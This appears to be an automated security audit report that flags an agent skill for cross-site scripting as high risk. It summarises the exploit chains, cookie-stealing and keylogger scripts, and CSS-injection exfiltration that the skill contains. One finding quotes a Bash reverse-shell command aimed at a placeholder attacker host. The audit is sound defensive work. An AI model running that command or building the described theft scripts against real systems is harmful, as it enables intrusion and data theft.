Skills
skills/yaklang/hack-skills/xss-cross-site-scripting/Gen Agent Trust Hub

xss-cross-site-scripting

Fail

Audited by Gen Agent Trust Hub on Apr 10, 2026

Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONDATA_EXFILTRATION
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The file SKILL.md contains functional exploit code for a WordPress-to-RCE chain, including a Bash reverse shell payload: bash -i >& /dev/tcp/ATTACKER/4444 0>&1.
  • [DATA_EXFILTRATION]: The skill provides scripts for stealing session cookies and implementing keyloggers that send captured data to remote attacker-controlled servers using the fetch and XMLHttpRequest APIs.
  • [COMMAND_EXECUTION]: The skill instructs on the use of the exiftool CLI to perform metadata injection by embedding malicious payloads into image files.
  • [DATA_EXFILTRATION]: In SCENARIOS.md, the skill describes CSS injection techniques to exfiltrate sensitive information like CSRF tokens via attribute selectors and font-face side channels.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Apr 10, 2026, 06:18 AM